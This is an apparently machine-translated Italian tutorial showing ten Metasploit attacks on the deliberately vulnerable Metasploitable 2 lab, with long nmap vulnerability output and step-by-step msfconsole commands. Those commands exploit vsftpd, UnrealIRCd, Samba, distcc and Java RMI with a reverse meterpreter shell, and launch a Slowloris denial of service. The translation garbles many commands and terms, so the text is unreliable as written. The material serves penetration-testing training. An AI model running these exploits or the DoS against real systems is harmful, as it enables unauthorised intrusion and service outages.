Top 10 esempi di utilizzo Metasploit

Top 10 esempi di utilizzo Metasploit
Metasploit è un framework di sicurezza fornito con molti strumenti per il sistema di sfruttamento e test. Questo tutorial mostra 10 esempi di attacchi di hacking contro un bersaglio Linux. L'obiettivo Linux è un ambiente di formazione Metasploable 2 OS, intenzionalmente vulnerabile agli utenti per imparare come sfruttare le sue vulnerabilità. Questo tutorial si concentra solo su 10 attacchi metasploit specifici, per informazioni sull'installazione Metasploable 2 Leggi di più qui.Per iniziare a scaricare Metasploit.

Nel mio caso ho scaricato la prova gratuita di Metasploit Pro, ma puoi ottenerne uno di loro.
La schermata seguente richiederà alcune delle tue informazioni personali, riempilo per passare alla pagina di download:

Scarica Metasploit per Linux:

Dare all'installatore che hai appena scaricato i diritti di esecuzione eseguendo:

# chmod +x metasploit-latest-linux-x64-installer.correre

Quindi eseguire Metasploit eseguendo:

# ./Metasploit-Latest-Linux-X64-Installer.correre

Come vedi un programma di GUI di installazione, fai clic su Inoltrare continuare:

Nella schermata successiva accetta l'accordo di licenza e fai clic su Inoltrare:

Lascia la directory predefinita e premi Inoltrare:

Alla domanda se per installare Metasploit come servizio, la raccomandazione non è, se lo fai, il servizio Metasploit inizierà ogni volta che si avvia, se si preme NO Il servizio Metasploit verrà lanciato solo su richiesta. Seleziona la tua scelta e premi in avanti per continuare:

Al fine di evitare interferenze, quando si utilizza Metasploit disattivare il firewall, premere Inoltrare continuare:

A meno che non sia già utilizzata la porta mostrata, premere Inoltrare continuare:

Lascia Localhost e premi Inoltrare continuare:

Quindi per procedere con la pressione di installazione Inoltrare Per l'ultima volta:

Il processo di installazione inizierà:

Infine, è stato installato Metasploit, nonostante il fatto che non lavoreremo con l'interfaccia Web Metasploit, puoi contrassegnarlo per mantenerlo disponibile. Premere Fine finire.

Risoluzione dei problemi di Metasploit DB Errore:

Nel mio caso, quando ho lanciato Metasploit, ha restituito l'errore:

 Nessun supporto del database: Impossibile connettersi al server: la connessione rifiutata è il server in esecuzione su host "localhost" (:: 1) e accettando le connessioni TCP/IP sulla porta 7337? 

Il motivo di questo errore è che la dipendenza PostgreSQL non è stata installata e neanche il servizio Metasploit.

Per risolverlo Run:

# Apt Installa -y PostgreSQL

Quindi inizia a postgreSQL eseguendo:

# SUD SERVIZIO POSTGRESQL Inizia

E infine iniziare il servizio Metasploit:

# sudo servizio metasploit avvio

Ora corri msfconsole Ancora una volta e noterai che l'errore è scomparso e siamo pronti ad attaccare Metasploable 2:

Utilizzo di Metasploit per scansionare un obiettivo per le vulnerabilità:

Il primo passo è scansionare il nostro obiettivo per scoprire servizi e vulnerabilità su di esso. Per raggiungerlo utilizzeremo NMAP di Metasploit e del suo script NSE (NMAP Scripting Engine) Vuln utilizzato per rilevare le vulnerabilità:

# db_nmap -v - -script vuln 192.168.0.184

NOTA: sostituire 192.168.0.184 Per il tuo indirizzo IP o host di destinazione.

Analizziamo l'output di NMAP:

IMPORTANTE: L'output NMAP conteneva oltre 4000 linee, pertanto l'uscita è stata ridotta lasciando le informazioni pertinenti da spiegare.

Le seguenti righe ci mostrano solo i tipi inizializzati di scansioni che coinvolgono NSE, ARP Ping Scan, Risoluzione DNS e una scansione Syn Stealth. Tutti questi passaggi erano già chiaramente spiegati a Linuxhint.com su NPING e NMAP ARP Scan, utilizzando gli script NMAP e NMAP Stealth Scan.

Si noti che NSE contiene pre-esecuzione, durante l'esecuzione della scansione e gli script post-esecuzione che vengono eseguiti prima, durante e dopo l'inizio e termina il processo di scansione.

 msf5> db_nmap -v - -script vuln 192.168.0.184 [*] NMAP: avviamento NMAP 7.70 (https: // nmap.Org) al 2020-02-04 16:56 -03 [*] NMAP: NSE: carichi 103 script per la scansione. [*] NMAP: NSE: pre-scanning dello script. [*] NMAP: Iniziare NSE a 16:56 [*] NMAP: completato NSE a 16:57, 10.00s Eluted [*] NMAP: Iniziazione NSE a 16:57 [*] NMAP: completato NSE a 16:57, 0.00s Eluted [*] NMAP: Iniziando la scansione del ping ARP a 16:57 [*] NMAP: scansione 192.168.0.184 [1 porta] [*] NMAP: scansione ARP completata alle 16:57, 0.05s Elsed (1 host totale) [*] NMAP: avvio della risoluzione DNS parallela di 1 host. Alle 16:57 [*] NMAP: risoluzione DNS parallela completa di 1 host. alle 16:57, 0.02s Eluted [*] NMAP: Initiating Syn Stealth Scan a 16:57 [*] NMAP: Scansione 192.168.0.184 [1000 porte] 

Il prossimo estratto mostra quali servizi sono disponibili sul nostro obiettivo:

 [*] NMAP: Open Port 25/TCP scoperto su 192.168.0.184 [*] NMAP: Open Port 80/TCP scoperta su 192.168.0.184 [*] NMAP: Porta aperta 445/TCP scoperta su 192.168.0.184 [*] NMAP: Porta aperta scoperta 139/TCP su 192.168.0.184 [*] NMAP: Porta aperta scoperta 3306/TCP su 192.168.0.184 [*] NMAP: Porta aperta scoperta 5900/TCP su 192.168.0.184 [*] NMAP: Open Port 22/TCP scoperta su 192.168.0.184 [*] NMAP: Porta aperta scoperta 53/TCP su 192.168.0.184 [*] NMAP: Porta aperta scoperta 111/TCP su 192.168.0.184 [*] NMAP: Open Port 21/TCP scoperto su 192.168.0.184 [*] NMAP: Open Port 23/TCP scoperta su 192.168.0.184 [*] NMAP: Porta aperta scoperta 1099/TCP su 192.168.0.184 [*] NMAP: Porta aperta scoperta 512/TCP su 192.168.0.184 [*] NMAP: Porta aperta scoperta 1524/TCP su 192.168.0.184 [*] NMAP: Porta aperta scoperta 513/TCP su 192.168.0.184 [*] NMAP: Porta aperta scoperta 514/TCP su 192.168.0.184 [*] NMAP: Porta aperta scoperta 2121/TCP su 192.168.0.184 [*] NMAP: Open Port 6000/TCP scoperta su 192.168.0.184 [*] NMAP: Porta aperta scoperta 2049/TCP su 192.168.0.184 [*] NMAP: Porta aperta scoperta 6667/TCP su 192.168.0.184 [*] NMAP: Open Port 8009/TCP scoperta su 192.168.0.184 [*] NMAP: Porta aperta scoperta 5432/TCP su 192.168.0.184 [*] NMAP: Porta aperta scoperta 8180/TCP su 192.168.0.184 [*] NMAP: completa Syn Stealth Scan a 16:57, 0.12s Elsed (1000 porte totali) 

Il seguente rapporto Extract Nse Post Scan Scripts Esecuzione per trovare vulnerabilità:

 [*] NMAP: NSE: Script Scanning 192.168.0.184. [*] NMAP: Iniziare NSE alle 16:57 [*] NMAP: completato NSE alle 17:02, 322.44s Eluted [*] NMAP: Iniziazione NSE a 17:02 [*] NMAP: completato NSE alle 17:02, 0.74s Eluted [*] NMAP: NMAP Scan Report per 192.168.0.184 [*] NMAP: Host è attivo (0.00075s latenza). [*] NMAP: non mostrato: 977 porte chiuse 

Come puoi vedere, NMAP ha già trovato buchi di sicurezza o vulnerabilità sul servizio Target FTP, collega persino gli exploit per hackerare l'obiettivo:

 [*] NMAP: Servizio di stato di porta [*] NMAP: 21/TCP Open ftp [*] nmap: | ftp-vsftpd-backdoor: [*] nmap: | Vulnerabile: [*] nmap: | VSFTPD versione 2.3.4 backdoor [*] nmap: | Stato: vulnerabile (sfruttabile) [*] nmap: | IDS: OSVDB: 73573 CVE: CVE-2011-2523 [*] NMAP: | VSFTPD versione 2.3.4 backdoor, questo è stato riportato il 2011-07-04. [*] Nmap: | Data di divulgazione: 2011-07-03 [*] NMAP: | Risultati di exploit: [*] nmap: | Comando shell: id [*] nmap: | Risultati: uid = 0 (root) gid = 0 (root) [*] nmap: | Riferimenti: [*] nmap: | http: // scarysecurity.Blogspot.com/2011/07/alert-vsftpd-download-backdoored.html [*] nmap: | http: // osvdb.org/73573 [*] nmap: | https: // github.com/rapid7/metasploit-framework/blob/master/moduli/exploits/unix/ftp/vsftpd_234_backdoor.rb [*] nmap: | _ https: // cve.mitra.org/cgi-bin/cvename.CGI?Nome = CVE-2011-2523 

Di seguito puoi vedere, inoltre ai fori di sicurezza FTP, NMAP ha rilevato le vulnerabilità SSL:

[*] Nmap: | _SSLV2-ANCHRO: [*] NMAP: 22/TCP Open SSH [*] NMAP: 23/TCP Open Telnet [*] NMAP: 25/TCP Open SMTP [*] NMAP: | SMTP-VULN-CVE2010-4344: [*] NMAP: | _ Il server SMTP non è EXIM: non vulnerabile [*] nmap: | SSL-DH-Params: [*] nmap: | Vulnerabile: [*] nmap: | Exchange chiave di difficoltà anonimo di diffie-hellman vulnerabilità [*] nmap: | Stato: vulnerabile [*] nmap: | Servizi di sicurezza del livello di trasporto (TLS) che utilizzano anonimi [*] nmap: | Diffie-Hellman Key Exchange fornisce solo protezione contro passivo [*] nmap: | intercettare e sono vulnerabili agli attacchi attivi man-in-the-middle [*] nmap: | che potrebbe compromettere completamente la riservatezza e l'integrità [*] nmap: | di qualsiasi dati scambiato durante la sessione risultante. [*] Nmap: | Controlla i risultati: [*] nmap: | Anonymous DH Group 1 [*] NMAP: | Suite cipher: tls_dh_anon_with_aes_256_cbc_sha [*] nmap: | Tipo di modulo: Safe Prime [*] NMAP: | Modulo Fonte: Postfix Builtin [*] nmap: | Lunghezza del modulo: 1024 [*] nmap: | Lunghezza del generatore: 8 [*] nmap: | Lunghezza della chiave pubblica: 1024 [*] nmap: | Riferimenti: [*] nmap: | https: // www.ietf.org/rfc/rfc2246.txt [*] nmap: | [*] Nmap: | Protocollo DHE_EXPORT DHE_EXPORT Sicurezza del livello di trasporto (logjam) [*] nmap: | Stato: vulnerabile [*] nmap: | IDS: OSVDB: 122331 CVE: CVE-2015-4000 [*] NMAP: | Il protocollo TLS (Transport Layer Security) contiene un difetto che è [*] NMAP: | innescato durante la gestione di scambi di chiave Diffie-Hellman definite con [*] NMAP: | la cifra DHE_Export. Ciò può consentire un attaccante man-in-the-middle [*] nmap: | Per eseguire il downgrade della sicurezza di una sessione TLS a 512 bit di livello di esportazione [*] NMAP: | Cryptography, che è significativamente più debole, permettendo all'attaccante [*] nmap: | Per rompere più facilmente la crittografia e il monitoraggio o la manomissione con [*] nmap: | il flusso crittografato. [*] Nmap: | Data di divulgazione: 2015-5-19 [*] NMAP: | Controlla i risultati: [*] nmap: | Gruppo DH di grado di esportazione 1 [*] NMAP: | Cipher Suite: TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA [*] NMAP: | Tipo di modulo: Safe Prime [*] NMAP: | Fonte del modulo: sconosciuto/generato personalizzato [*] nmap: | Lunghezza del modulo: 512 [*] nmap: | Lunghezza del generatore: 8 [*] nmap: | Lunghezza della chiave pubblica: 512 [*] nmap: | Riferimenti: [*] nmap: | https: // deboledh.org [*] nmap: | http: // osvdb.org/122331 [*] nmap: | https: // cve.mitra.org/cgi-bin/cvename.CGI?nome = cve-2015-4000 [*] nmap: | [*] Nmap: | Exchange Key Exchange di Diffie-Hellman Insufficiente Gruppo Forza [*] NMAP: | Stato: vulnerabile [*] nmap: | Servizi di sicurezza del livello di trasporto (TLS) che utilizzano gruppi Diffie-Hellman [*] NMAP: | di forza insufficiente, in particolare quelli che ne usano uno dei pochi NMAP comunemente [*]: | Gruppi condivisi, possono essere suscettibili agli attacchi passivi di intercettazione. [*] Nmap: | Controlla i risultati: [*] nmap: | DHE Weak DH Group 1 [*] NMAP: | Cipher Suite: TLS_DHE_RSA_WITH_DES_CBC_SHA [*] NMAP: | Tipo di modulo: Safe Prime [*] NMAP: | Modulo Fonte: Postfix Builtin [*] nmap: | Lunghezza del modulo: 1024 [*] nmap: | Lunghezza del generatore: 8 [*] nmap: | Lunghezza della chiave pubblica: 1024 [*] nmap: | Riferimenti: [*] NMAP: | _ https: // deboledh.org [*] nmap: | ssl-poodle: [*] nmap: | Vulnerabile: [*] nmap: | SSL Poodle Information Leak [*] NMAP: | Stato: vulnerabile [*] nmap: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | Il protocollo SSL 3.0, come usato in OpenSSL attraverso 1.0.1i e altri [*] nmap: | Prodotti, utilizza imbottitura CBC non deterministica, il che rende più semplice [*] nmap: | Per gli aggressori man-in-the-middle per ottenere dati ClearText tramite un [*] nmap: | Attacco di padding-oracle, alias il problema "barboncino". [*] Nmap: | Data di divulgazione: 2014-10-14 [*] NMAP: | Controlla i risultati: [*] nmap: | Tls_rsa_with_aes_128_cbc_sha [*] nmap: | Riferimenti: [*] nmap: | https: // cve.mitra.org/cgi-bin/cvename.CGI?nome = cve-2014-3566 [*] nmap: | https: // www.OpenSSL.org/~ bodo/ssl-poodle.pdf [*] nmap: | https: // www.Imperialviolet.org/2014/10/14/barboncino.html [*] nmap: | _ http: // osvdb.org/113251 [*] nmap: | SSLV2-NUNNO: [*] NMAP: | cifre: [*] nmap: | Ssl2_rc4_128_export40_with_md5 [*] nmap: | Ssl2_des_192_ede3_cbc_with_md5 [*] nmap: | Ssl2_rc2_128_cbc_with_md5 [*] nmap: | Ssl2_rc2_128_cbc_export40_with_md5 [*] nmap: | Ssl2_rc4_128_with_md5 [*] nmap: | Ssl2_des_64_cbc_with_md5 [*] nmap: | Vulns: [*] nmap: | CVE-2016-0703: [*] NMAP: | Titolo: OpenSSL: Recupero della chiave di sessione divisa-and-conquer in sslv2 [*] nmap: | Stato: vulnerabile [*] nmap: | IDS: [*] NMAP: | CVE: CVE-2016-0703 [*] NMAP: | Descrizione: [*] NMAP: | La funzione get_client_master_key in s2_srvr.C nell'implementazione SSLV2 in [*] NMAP: | OpenSSL prima di 0.9.8ZF, 1.0.0 prima di 1.0.0r, 1.0.1 prima di 1.0.1m e 1.0.2 prima di [*] nmap: | 1.0.2a accetta un valore diverso da key-clear-take-take-take per un arbitrario [*] nmap: | Cipher, che consente agli aggressori man-in-the-middle di determinare il valore principale [*] nmap: | e decrittono i dati cifri di testo sfruttando un Bleichenbacher RSA Padding Oracle, A [*] NMAP: | Problema correlato a CVE-2016-0800. [*] Nmap: | [*] Nmap: | Rif: [*] nmap: | https: // cve.mitra.org/cgi-bin/cvename.CGI?nome = cve-2016-0703 [*] nmap: | https: // www.OpenSSL.Org/Notizie/SECADV/20160301.TXT 

Il seguente estratto mostra molte vulnerabilità sul server web, incluso l'accesso a pagine di accesso sensibili e le vulnerabilità di negazione del servizio.

 [*] Nmap: 53/TCP Open Domain [*] NMAP: 80/TCP Open HTTP [*] NMAP: | http-csrf: [*] nmap: | Spidering Limited a: MaxDepth = 3; maxPageCount = 20; all'interno di host = 192.168.0.184 [*] nmap: | Trovato le seguenti possibili vulnerabilità CSRF: [*] NMAP: | [*] Nmap: | Path: http: // 192.168.0.184: 80/ dvwa/ [*] nmap: | Modulo ID: [*] NMAP: | Azione del modulo: accedi.php [*] nmap: | [*] Nmap: | Path: http: // 192.168.0.184: 80/dvwa/login.php [*] nmap: | ID modulo: [*] NMAP: | _ Azione del modulo: Accedi.php [*] nmap: | _http-dombased-xss: non sono riuscito a trovare XSS basato su DOM. [*] Nmap: | http-enum: [*] nmap: | /tikiwiki/: tikiwiki [*] nmap: | /test/: pagina di prova [*] nmap: | /phpinfo.PHP: possibile file di informazioni [*] nmap: | /phpmyadmin/: phpmyadmin [*] nmap: | /doc/: directory potenzialmente interessante con elenco su 'apache/2.2.8 (Ubuntu) Dav/2 '[*] nmap: | /icone/: cartella potenzialmente interessante con elenco di directory [*] nmap: | _/indice/: cartella potenzialmente interessante [*] nmap: | http-slowloris-check: [*] nmap: | Vulnerabile: [*] nmap: | Slowloris dos Attack [*] nmap: | Stato: probabile vulnerabile [*] nmap: | IDS: CVE: CVE-2007-6750 [*] NMAP: | Slowloris cerca di mantenere aperte molte connessioni al server Web di destinazione e trattenere [*] nmap: | loro si aprono il più a lungo possibile. Lo realizza aprendo le connessioni a [*] nmap: | il server Web di destinazione e invio di una richiesta parziale. In tal modo, muore di fame [*] nmap: | le risorse del server HTTP che causano negazione del servizio. [*] Nmap: | [*] Nmap: | Data di divulgazione: 2009-09-17 [*] NMAP: | Riferimenti: [*] nmap: | http: // ha.ckers.org/slowloris/[*] nmap: | _ https: // cve.mitra.org/cgi-bin/cvename.CGI?Nome = CVE-2007-6750 

In questa fase NMAP ha trovato molte vulnerabilità di iniezione di SQL, la quantità di vulnerabilità era così grande per questo tutorial che ne ho rimosso molti e ho lasciato alcuni:

 [*] Nmap: | HTTP-SQL-INIGIELLE: [*] NMAP: | Possibile SQLI per query: [*] nmap: | http: // 192.168.0.184: 80/DAV/?C = n%3bo%3DD%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/DAV/?C = S%3BO%3DA%27%20or%20sqlspider [*] NMAP: | http: // 192.168.0.184: 80/DAV/?C = m%3BO%3DA%27%20or%20sqlspider [*] NMAP: | http: // 192.168.0.184: 80/DAV/?C = d%3bo%3da%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indice.PHP?PAGINA = Pen-test-tool-wool.PHP%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indice.PHP?Pagina = documentazione%2fvulnerabilities.PHP%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indice.PHP?PAGINA = ATTIVATO-DATA.PHP%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indice.PHP?Page = testo-file-viewer.PHP%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/?Page = Aggiungi al tuo blog.PHP%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/?Page = Show-log.PHP%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indice.PHP?Pagina = Registra.PHP%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indice.PHP?Page = HTML5-STORAGE.PHP%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indice.PHP?Page = Utente-Info.PHP%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indice.PHP?Pagina = Home.PHP & DO = HOGLGLE-HINTS%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indice.PHP?Page = Show-log.PHP%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indice.PHP?PAGINA = NOTE.PHP%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indice.PHP?Page = Framing.PHP%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indice.PHP?Page = PHP-ERRORS.PHP%27%20or%20sqlspider [*] nmap: | http: // 192.168.0.184: 80/mutillidae/indice.PHP?Pagina = Home.PHP & DO = SCUSIONE AGGLEGGIO%27%20or%20sqlspider 

Sotto NMAP scarta di nuovo le vulnerabilità XSS (come nel primo estratto) e report

FOLI DI SICUREZZA DI INVICAZIONE METODI REMOTO (RMI) a causa della configurazione errata che consente a un utente malintenzionato di consentire l'esecuzione del codice Java dannoso:

 [*] NMAP: | _HTTP-STORED-XSS: Impossibile trovare alcuna vulnerabilità XSS memorizzata. [*] Nmap: | _http-trace: trace è abilitato [*] nmap: | _http-vuln-cve2017-1001000: errore: esecuzione dello script non riuscita (usa -d a debug) [*] nmap: 111/TCP Open rpcbind [ *] NMAP: 139/TCP Open NetBios-Ssn [*] NMAP: 445/TCP Open Microsoft-Ds [*] NMAP: 512/TCP Open Exec [*] NMAP: 513/TCP Open Login [*] NMAP: 514/ TCP Open Shell [*] NMAP: 1099/TCP Open rmireGistry [*] nmap: | RMI-Vuln-Classloader: [*] nmap: | Vulnerabile: [*] nmap: | Registro RMI Configurazione predefinita Codice remoto Esecuzione Vulnerabilità [*] NMAP: | Stato: vulnerabile [*] nmap: | La configurazione predefinita del registro RMI consente di caricare le classi da URL remoti che possono portare all'esecuzione del codice remoto. [*] Nmap: | [*] Nmap: | Riferimenti: [*] nmap: | _ https: // github.com/rapid7/metasploit-framework/blob/master/moduli/exploit/multi/misc/java_rmi_server.Rb 

Di seguito è possibile vedere ulteriori vulnerabilità SSL:

 [*] Nmap: | SSL-CCS-INIGITY: [*] NMAP: | Vulnerabile: [*] nmap: | Vulnerabilità MITM SSL/TLS (iniezione CCS) [*] NMAP: | Stato: vulnerabile [*] nmap: | Fattore di rischio: alto [*] nmap: | OpenSSL prima di 0.9.8za, 1.0.0 prima di 1.0.0m e 1.0.1 prima di 1.0.1H [*] nmap: | non limita correttamente l'elaborazione dei messaggi di ChangeCipherspec, [*] NMAP: | che consente agli aggressori man-in-the-middle di innescare l'uso di un nmap zero [*]: | Tasto principale di lunghezza in alcune comunicazioni OpenSSL-a-OPENSSL e [*] NMAP: | Di conseguenza, sessioni di hijack o ottengono informazioni sensibili, tramite [*] nmap: | Una stretta di mano TLS realizzata, alias la vulnerabilità "Iniezione CCS". [*] Nmap: | [*] Nmap: | Riferimenti: [*] nmap: | https: // cve.mitra.org/cgi-bin/cvename.CGI?nome = cve-2014-0224 [*] nmap: | http: // www.Cvedetails.com/cve/2014-0224 [*] nmap: | _ http: // www.OpenSSL.Org/News/SECADV_20140605.txt [*] nmap: | SSL-DH-Params: [*] nmap: | Vulnerabile: [*] nmap: | Exchange Key Exchange di Diffie-Hellman Insufficiente Gruppo Forza [*] NMAP: | Stato: vulnerabile [*] nmap: | Servizi di sicurezza del livello di trasporto (TLS) che utilizzano gruppi Diffie-Hellman [*] NMAP: | di forza insufficiente, in particolare quelli che ne usano uno dei pochi NMAP comunemente [*]: | Gruppi condivisi, possono essere suscettibili agli attacchi passivi di intercettazione. [*] Nmap: | Controlla i risultati: [*] nmap: | DHE Weak DH Group 1 [*] NMAP: | Cipher Suite: TLS_DHE_RSA_WITH_AES_128_CBC_SHA [*] NMAP: | Tipo di modulo: Safe Prime [*] NMAP: | Fonte del modulo: sconosciuto/generato personalizzato [*] nmap: | Lunghezza del modulo: 1024 [*] nmap: | Lunghezza del generatore: 8 [*] nmap: | Lunghezza della chiave pubblica: 1024 [*] nmap: | Riferimenti: [*] NMAP: | _ https: // deboledh.org [*] nmap: | ssl-poodle: [*] nmap: | Vulnerabile: [*] nmap: | SSL Poodle Information Leak [*] NMAP: | Stato: vulnerabile [*] nmap: | IDS: OSVDB: 113251 CVE: CVE-2014-3566 [*] NMAP: | Il protocollo SSL 3.0, come usato in OpenSSL attraverso 1.0.1i e altro 

Il prossimo estratto mostra che il nostro obiettivo è probabilmente infetto da un Trojan contro un servizio IRC:

 [*] Nmap: | _irc-unrealircd-backdoor: sembra una versione a troia. Vedi http: // Secististi.Org/FullDisclosure/2010/Jun/277 [*] NMAP: 8009/TCP Open AJP13 

Il seguente estratto mostra che il flag httponly non è correttamente configurato, quindi il bersaglio è vulnerabile agli attacchi di scripting incrociati:

 [*] NMAP: 8180/TCP Open Unknown [*] nmap: | http-cookie-flags: [*] nmap: | /admin/: [*] nmap: | JSessionid: [*] nmap: | Flag httponly non Imposta [*] nmap: | /amministratore/indice.html: [*] nmap: | JSessionid: [*] nmap: | Flag httponly non Imposta [*] nmap: | /admin/login.html: [*] nmap: | JSessionid: [*] nmap: | Flag httponly non Imposta [*] nmap: | /admin/admin.html: [*] nmap: | JSessionid: [*] nmap: | Flag httponly non Imposta [*] nmap: | /amministratore/account.html: [*] nmap: | JSessionid: [*] nmap: | Flag httponly non Imposta [*] nmap: | /admin/admin_login.html: [*] nmap: | JSessionid: [*] nmap: | Flag httponly non Imposta [*] nmap: | /Admin/Home.html: 

Il seguente estratto enumera o elenca interessanti directory accessibili trovate sul nostro obiettivo:

 [*] Nmap: | http-enum: [*] nmap: | /admin/: possibile cartella amministratore [*] nmap: | /amministratore/indice.HTML: possibile cartella amministratore [*] nmap: | /admin/login.HTML: possibile cartella amministratore [*] nmap: | /admin/admin.HTML: possibile cartella amministratore [*] nmap: | /amministratore/account.HTML: possibile cartella amministratore [*] nmap: | /admin/admin_login.HTML: possibile cartella amministratore [*] nmap: | /Admin/Home.HTML: possibile cartella amministratore [*] nmap: | /amministratore/amministratore.HTML: possibile cartella amministratore [*] nmap: | /admin/adminlogin.HTML: possibile cartella amministratore [*] nmap: | /admin/controlpanel.HTML: possibile cartella amministratore [*] nmap: | /admin/cp.HTML: possibile cartella amministratore [*] nmap: | /amministratore/indice.JSP: possibile cartella di amministrazione 

Infine, la scansione termina e viene eseguita la NSE post-scansione:

 [*] Nmap: | [*] Nmap: | Data di divulgazione: 2009-09-17 [*] NMAP: | Riferimenti: [*] nmap: | http: // ha.ckers.org/slowloris/[*] nmap: | _ https: // cve.mitra.org/cgi-bin/cvename.CGI?nome = CVE-2007-6750 [*] NMAP: Indirizzo MAC: 08: 00: 27: DD: 87: 8C (Oracle VirtualBox Virtual Nic) [*] NMAP: Risultati dello script host: [*] NMAP: | _SMB-Vuln -ms10-054: false [*] nmap: | _smb-vuln-ms10-061: false [*] nmap: nse: script post-scanning. [*] NMAP: Iniziare NSE alle 17:02 [*] NMAP: completato NSE alle 17:02, 0.00s Eluted [*] NMAP: Iniziazione NSE alle 17:02 [*] NMAP: completato NSE alle 17:02, 0.00s Elsed [*] NMAP: leggi i file di dati da:/opt/metasploit/comune/share/nmap/[*] nmap: nmap fatto: 1 indirizzo IP (1 host up) scansionato in 333.96 secondi [*] NMAP: pacchetti grezzi inviati: 1001 (44.028kb) | RCVD: 1001 (40.120kb) MSF5> 

Ora abbiamo identificato alcuni buchi di sicurezza per attaccare il nostro obiettivo.

Utilizzo di Metasploit per hackerare un server FTP:

Dopo aver identificato i buchi di sicurezza sul bersaglio, utilizzare i comandi Metasploit per trovare exploit adeguati contro di loro. Come hai visto in precedenza una delle prime vulnerabilità trovate era sul server VSFTPD, per trovare exploit adeguati, all'interno di Metasploit Run:

# Cerca vsftpd

Come vedi Metasploit contiene una backdoor che potrebbe aiutarci a hackerare il nostro FTP target. Per utilizzare questo exploit, all'interno di Metasploit Run:

# Usa Exploit/Unix/FTP/VSFTPD_234_Backdoor

Per imparare a utilizzare qualsiasi esecuzione di exploit specifica:

# mostra le opzioni

Come vedi sopra, questo exploit contiene 2 opzioni, rhosts (host remoto) e rport. Dobbiamo specificare il rhost, la porta è già specificata (21).
Per impostare l'host remoto (RHOST) che definisce l'esecuzione IP di destinazione:

# Set rhost 192.168.0.184

Una volta definito il target eseguire il comando seguente per sfruttare il foro di sicurezza:

# impresa

Come vedevi ho ottenuto una shell nel bersaglio, quando esegui "LS" posso vedere i file di destinazione, l'attacco è riuscito. Per lasciare il bersaglio, basta correre:

#Uscita

Usando Metasploit per l'attacco DOS:

Come hai visto durante il processo di scansione, è stata trovata una vulnerabilità DOS Slowloris, al fine di scoprire come sfruttarlo seguire i passaggi precedenti per cercare uno strumento adeguato, in questo caso un modulo ausiliario anziché un exploit:

# Cerca Slowloris

Una volta trovato uno strumento da attaccare, eseguire:

# Usa ausiliario/dos/http/slowloris
# Set rhost 192.168.0.184

Quindi solo digitare:

# correre

Noterai che mentre l'attacco funziona, il servizio HTTP target non sarà disponibile, continua a caricare:

Una volta che fermiamo l'attacco premendo CTRL+C Il server sarà di nuovo disponibile:

Utilizzo di Metasploit per hackerare un server IRC:

La chat di relè Internet è ampiamente utilizzata in tutto il mondo, come si potrebbe notare durante le prime fasi del Metasploit di scansione probabilmente trovato un servizio IRC (Unreal IRCD) infetto da un Trojan.

Ripetiamo i passaggi per trovare uno strumento per hackerarlo:

# Cerca unreal IRCD
# usa Exploit/Unix/IRC/Unreal_ircd_3281_Backdoor
# mostra le opzioni
# Set rhost 192.168.0.184

Quindi corri:

# impresa

E come puoi vedere di nuovo, abbiamo una sessione di shell all'interno del target.

Utilizzando Metasploit per eseguire il codice malizioso Java:

# Usa Exploit/Multi/Misc/Java_Rmi_Server
# mostra le opzioni
# Set rhost 192.168.0.184
# Mostra carichi utili
# Imposta payload java/meterpreter/reverse_tcp
# Imposta lhost 192.168.0.50
# impresa

Utilizzo di Metasploit per hackerare la vulnerabilità dello script di UserMap Samba:

Alcuni passaggi come la ricerca di exploit saranno omessi per evitare un enorme tutorial. Per sfruttare questa corsa di vulnerabilità:

# Utilizza Exploit/Multi/Samba/UserMap_Script
# mostra le opzioni

Imposta l'IP di destinazione e sfruttalo eseguendo:

# Set rhost 192.168.0.184
# impresa

Come puoi vedere, abbiamo guadagnato un guscio nel nostro obiettivo.

Utilizzo di Metasploit per sfruttare l'esecuzione del comando demone DISTCC:

Questa vulnerabilità è spiegata qui.

Per iniziare a correre:

# Usa Exploit/Unix/Misc/Discc_Exec

Quindi corri:

# Set rhost 192.168.0.184
# impresa

Come puoi vedere, abbiamo ottenuto di nuovo l'accesso al bersaglio.

Utilizzo di Metasploit per la scansione delle porte (modo aggiuntivo senza NMAP):

Eseguire una scansione TCP con Metasploit:

Per eseguire una scansione diversa senza utilizzare NMAP Metasploit offre alternative che puoi trovare in esecuzione:

# Cerca PortScan

Per eseguire una corsa di scansione TCP:

# Utilizza scanner/PortScan/TCP
# Set rhost 192.168.0.184

Per vedere ulteriori opzioni:

# mostra le opzioni

Scegli l'intervallo di porte che desideri scansionare eseguendo:

# Imposta le porte 21-35

Quindi eseguire la scansione eseguendo:

# correre

Come puoi vedere le porte 22,25,23 e 21 sono state trovate aperte.

Eseguire una scansione SYN con Metasploit:

Per una corsa di scansione syn:

# Utilizza ausiliari/scanner/portscan/syn
# Set rhost 192.168.0.184
# Imposta le porte 80
# correre

Come puoi vedere la porta 80 è stata trovata aperta.

CONCLUSIONE

Metasploit è come un coltello dell'esercito svizzero che ha così tante funzioni. Spero che tu abbia trovato questo tutorial nessun metasploit utile. Continua a seguire LinuxHint per ulteriori suggerimenti e aggiornamenti su Linux e Networking.